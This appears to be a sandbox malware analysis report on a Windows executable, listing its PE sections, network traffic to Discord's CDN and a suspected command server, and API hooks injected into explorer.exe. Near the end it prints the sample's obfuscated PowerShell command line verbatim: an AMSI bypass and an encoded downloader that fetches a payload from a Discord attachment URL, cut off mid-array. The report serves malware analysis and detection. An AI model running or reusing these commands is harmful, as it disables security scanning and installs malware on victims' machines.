                                        .pdata0x60000x2700x400False0.6533203125data5.62214281151IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .xdata0x70000x1f40x200False0.462890625data3.72511278935IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .bss0x80000x9800x0False0empty0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .idata0x90000x7e80x800False0.53759765625data4.83593419899IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .CRT0xa0000x680x200False0.056640625data0.170145652003IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .tls0xb0000x100x200False0.02734375data0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .vmp00xc0000xec00x1000False0.83056640625data7.19991970418IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ
                                        .cobf0xd0000xbde0xc00False0.638997395833data6.157131337IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                        Imports

                                        DLLImport
                                        KERNEL32.dllSleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep
                                        msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, exit, free, fwrite, malloc, memcpy, signal, strlen, strncmp, vfprintf
                                        USER32.dll

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        07/22/21-17:59:32.490432ICMP382ICMP PING Windows192.168.2.5216.58.215.238
                                        07/22/21-17:59:32.490432ICMP384ICMP PING192.168.2.5216.58.215.238
                                        07/22/21-17:59:32.532665ICMP408ICMP Echo Reply216.58.215.238192.168.2.5

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 22, 2021 17:59:33.313534021 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.354799032 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.355076075 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.381356955 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.422544956 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.423137903 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.423166037 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.423295021 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.460189104 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.502388000 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.502476931 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.502589941 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.504381895 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.545577049 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.589994907 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590024948 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590046883 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590065002 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590090036 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590112925 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590127945 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.590136051 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590157986 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590182066 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.590200901 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.590910912 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590940952 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.591077089 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.591095924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.591895103 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.591931105 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.592003107 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.592906952 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.592931986 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.592969894 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.593012094 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.593780994 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.593811989 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.593868017 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.594769001 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.594804049 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.594871044 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.594896078 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.595767021 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.595798969 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.595869064 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.596723080 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.596754074 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.596821070 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.597675085 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.597702026 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.597737074 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.597771883 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.598653078 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.598686934 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.598737955 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.598783970 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.599637032 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.599668980 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.599728107 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.600619078 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.600646019 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.600697994 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.601591110 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.601619959 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.601681948 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.601716995 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.602497101 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.603399992 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632543087 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.632596970 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.632664919 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632839918 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632945061 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633280039 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633335114 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.633423090 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.633924961 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633969069 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634002924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634030104 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634877920 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634928942 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634946108 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634985924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.635870934 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.635915041 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.635962963 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.636019945 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.636827946 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.636868954 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.636960030 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.637772083 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.637813091 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.637886047 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.637927055 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.638742924 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.638786077 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.638839006 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.638868093 CEST49711443192.168.2.5162.159.134.233

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 22, 2021 17:59:15.966249943 CEST5479553192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:16.018271923 CEST53547958.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:17.030975103 CEST4955753192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:17.081573963 CEST53495578.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:17.835160017 CEST6173353192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:17.887351990 CEST53617338.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:18.366911888 CEST6544753192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:18.432480097 CEST53654478.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:19.198745966 CEST5244153192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:19.248092890 CEST53524418.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:20.662686110 CEST6217653192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:20.712065935 CEST53621768.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:21.769877911 CEST5959653192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:21.819135904 CEST53595968.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:22.737807035 CEST6529653192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:22.795145988 CEST53652968.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:23.640221119 CEST6318353192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:23.689425945 CEST53631838.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:25.277851105 CEST6015153192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:25.334655046 CEST53601518.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:32.378942013 CEST5696953192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:32.429265022 CEST53569698.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:32.432296038 CEST5516153192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:32.489460945 CEST53551618.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:33.240242004 CEST5475753192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:33.302604914 CEST53547578.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:42.491311073 CEST4999253192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:42.574757099 CEST53499928.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:49.367983103 CEST6007553192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:49.435719013 CEST53600758.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:09.963759899 CEST5501653192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:10.026026964 CEST53550168.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:13.805746078 CEST6434553192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:13.880527973 CEST53643458.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:26.398986101 CEST5712853192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:26.463774920 CEST53571288.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:30.650922060 CEST5479153192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:30.700320959 CEST53547918.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:57.994560957 CEST5046353192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:58.188177109 CEST53504638.8.8.8192.168.2.5
                                        Jul 22, 2021 18:01:04.873130083 CEST5039453192.168.2.58.8.8.8
                                        Jul 22, 2021 18:01:04.944116116 CEST53503948.8.8.8192.168.2.5
                                        Jul 22, 2021 18:01:07.035242081 CEST5853053192.168.2.58.8.8.8
                                        Jul 22, 2021 18:01:07.109100103 CEST53585308.8.8.8192.168.2.5
                                        Jul 22, 2021 18:01:19.086133957 CEST5381353192.168.2.58.8.8.8
                                        Jul 22, 2021 18:01:19.148035049 CEST53538138.8.8.8192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jul 22, 2021 17:59:32.378942013 CEST192.168.2.58.8.8.80xa53fStandard query (0)google.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:32.432296038 CEST192.168.2.58.8.8.80xb7caStandard query (0)google.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.240242004 CEST192.168.2.58.8.8.80x4bc7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 18:00:57.994560957 CEST192.168.2.58.8.8.80xe518Standard query (0)www.rajuherbalandspicegarden.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 18:01:19.086133957 CEST192.168.2.58.8.8.80x8d59Standard query (0)www.strawberrylinebikehire.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jul 22, 2021 17:59:32.429265022 CEST8.8.8.8192.168.2.50xa53fNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:32.489460945 CEST8.8.8.8192.168.2.50xb7caNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 18:00:58.188177109 CEST8.8.8.8192.168.2.50xe518No error (0)www.rajuherbalandspicegarden.comrajuherbalandspicegarden.comCNAME (Canonical name)IN (0x0001)
                                        Jul 22, 2021 18:00:58.188177109 CEST8.8.8.8192.168.2.50xe518No error (0)rajuherbalandspicegarden.com192.185.17.130A (IP address)IN (0x0001)
                                        Jul 22, 2021 18:01:19.148035049 CEST8.8.8.8192.168.2.50x8d59Name error (3)www.strawberrylinebikehire.comnonenoneA (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.rajuherbalandspicegarden.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.549724192.185.17.13080C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 22, 2021 18:00:58.357666969 CEST7373OUTGET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1
                                        Host: www.rajuherbalandspicegarden.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 22, 2021 18:00:59.770776987 CEST7375INHTTP/1.1 301 Moved Permanently
                                        Date: Thu, 22 Jul 2021 16:00:59 GMT
                                        Server: nginx/1.19.10
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        X-UA-Compatible: IE=edge
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        X-Redirect-By: WordPress
                                        Location: http://rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH
                                        X-Endurance-Cache-Level: 2
                                        X-Server-Cache: true
                                        X-Proxy-Cache: MISS


                                        HTTPS Packets

                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                        Jul 22, 2021 17:59:33.423166037 CEST162.159.134.233443192.168.2.549711CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE3
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE3
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE3
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE3

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:17:59:22
                                        Start date:22/07/2021
                                        Path:C:\Users\user\Desktop\s2rsXUiUn8.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\s2rsXUiUn8.exe'
                                        Imagebase:0x400000
                                        File size:26624 bytes
                                        MD5 hash:F5041EC4CE468A07ECBFD076BC0F879B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:17:59:23
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:17:59:24
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,